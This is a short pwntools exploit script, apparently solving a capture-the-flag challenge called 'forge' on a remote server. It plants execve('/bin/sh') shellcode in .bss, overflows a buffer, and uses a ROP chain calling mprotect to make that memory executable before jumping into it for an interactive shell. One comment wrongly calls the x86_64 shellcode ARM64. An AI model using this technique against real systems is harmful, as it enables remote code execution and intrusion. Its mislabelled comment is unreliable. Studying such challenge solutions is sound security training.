#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF('./forge', checksec=False)
context.arch = 'amd64'

p = remote("offsec.m0lecon.it", 13553)

OFFSET_TO_RIP = 72

# shellcode = asm(shellcraft.sh())

# NOTE: To let it work in ARM64, we need to use a different shellcode, since the one generated by shellcraft.sh() is for x86_64
# The following shellcode is for ARM64 and does the same thing: spawns a shell by executing /bin/sh
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

shellcode_addr = elf.sym.shellcode  # because PIE is disabled, the 'shellcode' global variable is at a fixed address
page = shellcode_addr & ~0xfff      # mprotect requires the address to be page-aligned (a multiple of 0x1000)

# Stage 1: send shellcode into .bss
p.recvuntil(b'[forge] Send shellcode:')
p.send(shellcode.ljust(0x400, b'\x90'))

# Stage 2: ROP chain
payload = flat(
    b'A' * OFFSET_TO_RIP,
    p64(elf.sym.ret_gadget),
    p64(elf.sym.pop_rdi_ret), p64(page),    # mprotect arg 1: page-aligned address of the shellcode (computed above)
    p64(elf.sym.pop_rsi_ret), p64(0x1000),  # mprotect arg 2: 0x1000 bytes (one page)
    p64(elf.sym.pop_rdx_ret), p64(0x7),     # mprotect arg 3: PROT_READ | PROT_WRITE | PROT_EXEC = 0x7
    p64(elf.plt.mprotect),                  # call mprotect(page, 0x1000, 0x7) to make the buffer (containing the shellcode) executable
    p64(elf.sym.shellcode),                 # after mprotect returns, jump to the shellcode in .bss
)

p.recvuntil(b'[forge] Input:')
p.send(payload)
p.interactive()
